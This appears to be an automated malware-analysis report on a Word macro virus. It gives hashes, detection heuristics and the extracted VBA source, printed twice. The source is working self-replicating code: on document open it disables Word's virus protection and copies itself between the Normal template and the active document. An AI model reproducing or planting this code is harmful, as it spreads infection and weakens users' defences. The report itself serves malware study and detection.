Office (OLE) malware analysis — malicious · f8c5f33f6df4a04d

MALICIOUS

Office (OLE)

26.5 KB Created: 1997-01-29 21:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 5926d4635a800106d75f6099eeee335b SHA-1: adf0c97fa20c28f831340329007f8b18974cdb5c SHA-256: f8c5f33f6df4a04d88fa96a6d36abab10bcc98c8482597674e7531bb11b76920

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to disable virus protection by setting 'Options.VirusProtection = False'. It also displays a warning message to the user, which could be a social engineering tactic or a distraction. The macro attempts to copy itself to the Normal template and the active document, potentially for persistence or propagation.

Heuristics 3

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1212 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1212 bytes
SHA-256: `c5f8587311e179265736f2940ff75abb2211dcb7f48a0d811adafb69f3d93f28`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Options.VirusProtection = False If InStr(Date, "28.4.") <> 0 Then MsgBox "Nazdar!" + Chr(10) + Chr(13) + _ "Ja som virus WORDO a ked sa mi bude chciet" _ + ", tak znicim vsetky data v tomto " _ + "pocitaci.", vbOKOnly + vbExclamation, _ "VIRUS" End If If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then GoTo 1 If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines <> 0 Then Exit Sub pr = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines - 1 z = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, pr) ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString (z) ActiveDocument.Save Exit Sub 1 pr = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines - 1 z = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, pr) NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString (z) NormalTemplate.Save End Sub

SHA-256: c5f8587311e179265736f2940ff75abb2211dcb7f48a0d811adafb69f3d93f28

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Options.VirusProtection = False
If InStr(Date, "28.4.") <> 0 Then
MsgBox "Nazdar!" + Chr(10) + Chr(13) + _
"Ja som virus WORDO a ked sa mi bude chciet" _
+ ", tak znicim vsetky data v tomto " _
+ "pocitaci.", vbOKOnly + vbExclamation, _
"VIRUS"
End If
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then GoTo 1
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines <> 0 Then Exit Sub
pr = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines - 1
z = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, pr)
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString (z)
ActiveDocument.Save
Exit Sub
1
pr = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines - 1
z = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, pr)
NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString (z)
NormalTemplate.Save
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.